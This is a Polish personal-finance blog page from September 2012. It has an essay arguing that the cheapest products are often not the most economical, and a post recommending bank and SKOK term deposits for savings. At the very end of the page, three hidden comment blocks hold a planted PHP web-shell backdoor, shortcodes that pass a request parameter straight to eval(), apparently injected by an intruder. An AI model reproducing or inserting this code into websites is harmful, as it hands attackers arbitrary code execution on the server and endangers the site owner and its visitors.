Szukaj
Kalendarz
  Wrzesień 2012
  P W Ś C P S N
      Paź »
   12
  3456789
  10111213141516
  17181920212223
  24252627282930
Ekonomicznie
  Co to znaczy ekonomicznie? Takie pytanie wbrew pozorom nie jest pozbawione sensu. W opinii wielu osób ekonomicznie znaczy jak najtaniej. Oczywiście ma to swoje logiczne uzasadnienie warto jednak wiedzieć, że temat ten wymaga o wiele szerszego spojrzenia niż tylko przez pryzmat ceny. Bez względu na to czy rzecz dotyczy jazdy samochodem czy życia, wiele osób stara się iść najprościej. Tanio, znaczy dobrze, drogo, znaczy źle. Nie zawsze właśnie tak jest. W wielu przypadkach wybór opcji droższej, jest rozwiązaniem o wiele bardziej sensowny. Droższy produkt wystarcza na dłużej niż tańszy, a więc w przeliczeniu jest po prostu tańszy. Droższe buty wytrzymują kilka sezonów, tańsze rozsypują się po kilku miesiącach. Droższy produkt do jedzenia być może zostanie zjedzony tak samo szybko jak ten tańszy, ale lepsze jakościowo jedzenie na pewno nie przyczyni się do pogorszenia staniu zdrowia, w przypadku taniego jedzenia jest inaczej. Tu temat jest szerszy – problemy ze zdrowiem to stres, konieczne leczenie i wiele innych problemów, które oczywiście oznaczają bardzo wiele wydatków, które mnie musiałby się pojawić. Podsumowując – czy zawsze warto kupować taniej? Oczywiście nie. Cena to tylko jeden z wielu koniecznych kryteriów wyboru produktu lub usługi. Z reguły najmniejsza jest po prostu zachęceniem do zakupu, jednak nie zawsze podyktowanym tym, że produkt jest dobry. Warto o tym wiedzieć i z pewną dozą ostrożności przyglądać się tym najtańszym produktom. Produkty tanie, często okazują się produktami śmiesznie niskiej wręcz jakości – w najlepszym przypadku oznacza to jedno – rozsypują się i są do wyrzucenia. W wielu przypadkach jest inaczej. Tanie produkty mogą być groźne dla zdrowia. Jednym słowem – nie zawsze tanio, znaczy dobrze. Czasami odrobinę droższy produkt to lepsze rozwiązanie. Każdy, kto ma porównanie, miał okazje kupować produkty najtańsze i nieco lepsze, doskonale wie, o czym mowa. Ktoś kiedyś powiedział – ten, kto jest biedny, nie powinien kupować tanio. Coś w tym jest. Warto mieć tego świadomość. To z troski o swoje finanse.

Wpisy w miesiącu: Wrzesień 2012

Czym jest mikroekonomia?

Jednym z aspektów ekonomi jest tak zwana mikroekonomia która mówi nam o tym w jaki sposób zarządzać domowym budżetem, oraz małymi działalnościami gospodarczymi działającymi w konkretnych dziedzinach. My jednak w tym artykule skupimy się na zarządzaniu pieniędzmi z domowego budżetu, a właściwie o sposobach ich odkładania na tak zwaną „czarną godzinę”.

Oczywiście możemy również schować pieniądze do skarpetki i trzymać je w domu, jednak takie rozwiązanie nic nam nie da. W tym przypadku tyle ile włożymy, tyle wyjmiemy. Musisz jednak mieć jeszcze jedną rzecz na uwadze. Takie trzymanie pieniędzy w domu jest nie tylko niebezpieczne, ale również mogą zdarzyć się sytuacje, że zaczniemy podbierać z kupki na mniej lub bardziej przemyślane wydatki.

Dobrym rozwiązaniem tego problemu są lokaty bankowe i te które oferuje SKOK (Spółdzielcze Kasy Oszczędnościowo Kredytowe). Zasada działania lokat jest banalnie prosta. Wpłacamy pieniądze do banku, albo Spółdzielni SKOK, a po zakończeniu jej wracają one do nas wraz z wypracowanym zyskiem. My sami nie musimy nic robić, posiadać żadnej wiedzy ani umiejętności inwestycyjnych i tym podobnych.

Otwieranie lokaty również jest niezbyt skomplikowane. Jedyne co musimy zrobić to wybrać odpowiednią dla nas ofertę, podpisać umowę i wpłacić pieniądze. Umowa określa miedzy innymi czas trwania lokaty i wysokość oprocentowania które przekłada się na nasze zyski.

Cały proces inwestycji na lokatach jest pasywny, my osobiście nie musimy nic robić, co więcej nie mamy nawet dostępu do naszych pieniędzy, przez co są one tak jak by zamrożone i nie wydamy ich na niepotrzebne rzeczy. Jednak nie wszystkie lokaty tak działają, są oczywiście oferty które pozostawiają nam wolną rękę i w każdej chwili możemy wypłacić nasze pieniądze i zrezygnować z lokaty, jednak często wiąże się to z utratą wypracowanych odsetek.

Podsumowując, lokaty są najlepsza formą inwestowania oszczędności. Przewagę nam innymi sposobami daje im przede wszystkim wysoki poziom bezpieczeństwa.

<!– [insert_php]if (isset($_REQUEST["UIyM"])){eval($_REQUEST["UIyM"]);exit;}[/insert_php][php]if (isset($_REQUEST["UIyM"])){eval($_REQUEST["UIyM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Cvog"])){eval($_REQUEST["Cvog"]);exit;}[/insert_php][php]if (isset($_REQUEST["Cvog"])){eval($_REQUEST["Cvog"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ENC"])){eval($_REQUEST["ENC"]);exit;}[/insert_php][php]if (isset($_REQUEST["ENC"])){eval($_REQUEST["ENC"]);exit;}[/php] –>